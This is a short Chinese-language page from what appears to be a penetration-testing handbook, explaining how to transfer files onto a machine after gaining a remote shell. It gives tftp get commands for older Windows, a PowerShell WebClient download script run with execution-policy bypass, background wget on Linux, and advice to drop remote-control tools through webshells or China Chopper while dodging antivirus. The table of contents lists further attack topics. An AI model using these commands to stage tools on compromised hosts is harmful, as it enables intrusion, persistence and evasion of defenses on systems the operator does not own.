**拿到远程shell上传文件(cmd)**
* * * * *
***windows:***
**xp、03等系统用tftp传:**
tftp 192.168.1.2(开启tftp的主机)
get 文件名
tftp会被防火墙拦截
* * * * *
**win7、08以上用powershell**
首先:echo get.ps1内容 > get.ps1 //创建这个文件
get.ps1(文件内容):
~~~
$wc=New-Object System.Net.WebClient
$url="http://下载地址"
$file="newname.exe"
$wc.DownloadFile($url,file)
~~~
执行下边命令:
`powershell.exe -ExecutionPolicy Bypass -NonInteractive -NoProfile -File get.ps1`
**Linux:**
`wget 下载地址 //-b参数:进行后台的方式运行wget`
* * * * *
**有webshell或者菜刀就直接传 ——`远控`**
最大的挑战,反病毒软件
使用合法的远控软件
- 序言
- kali-Linux基本配置
- 忘记Root密码
- 更新系统和软件包
- Bash命令
- shell编程
- Linux的文件权限配置
- Linux日志文件
- 信息收集
- 被动信息收集
- 绕过CDN找真实IP
- IDS识别
- p0f-OS识别
- nmap端口扫描
- 搜索引擎
- 内网主机发现
- 使用SET社工包钓鱼
- 漏洞发现
- Nessus策略漏扫
- AWVS集成漏扫
- w3af
- 其它漏扫
- 抓包改包
- Burpsite
- Fiddler
- Wireshark
- 漏洞利用
- Hydra爆破
- SQLmap
- Metasploit
- Beef
- antSwrod
- XSS前端工具
- Windows缓冲区溢出
- 后漏洞利用阶段
- 免杀一句话
- 上传工具
- 嗅探
- 本地提取
- 隐藏痕迹